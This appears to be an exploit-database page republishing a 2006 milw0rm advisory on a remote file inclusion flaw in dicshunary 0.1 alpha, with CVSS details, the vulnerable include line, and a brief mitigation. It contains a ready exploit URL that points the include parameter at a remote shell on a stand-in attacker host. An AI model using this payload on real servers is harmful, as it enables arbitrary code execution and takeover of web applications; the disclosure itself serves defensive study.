header-logo
Suggest Exploit
vendor:
dicshunary 0.1 alpha
by:
DeltahackingTEAM
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: dicshunary 0.1 alpha
Affected Version From: dicshunary 0.1 alpha
Affected Version To: dicshunary 0.1 alpha
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

dicshunary 0.1 alpha Remote File Inclusion Vulnerability

dicshunary 0.1 alpha is prone to a remote file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name :dicshunary 0.1 alpha

* Class = Remote File Inclusion ;
 
* Download =http://puzzle.dl.sourceforge.net/sourceforge/dicshunary/dicshunary_0.1alpha.tar.gz

* Found by = DeltahackingTEAM

* User In Delta Team (TAnha & Dr.Pantagon )

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

include_once($dicshunary_root_path.'common.inc');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/check_status.php?dicshunary_root_path=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

SP TNX : Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc,

**********************************************************************************************************

# milw0rm.com [2006-11-17]

Navigation

Suggest Exploit

Services By CQR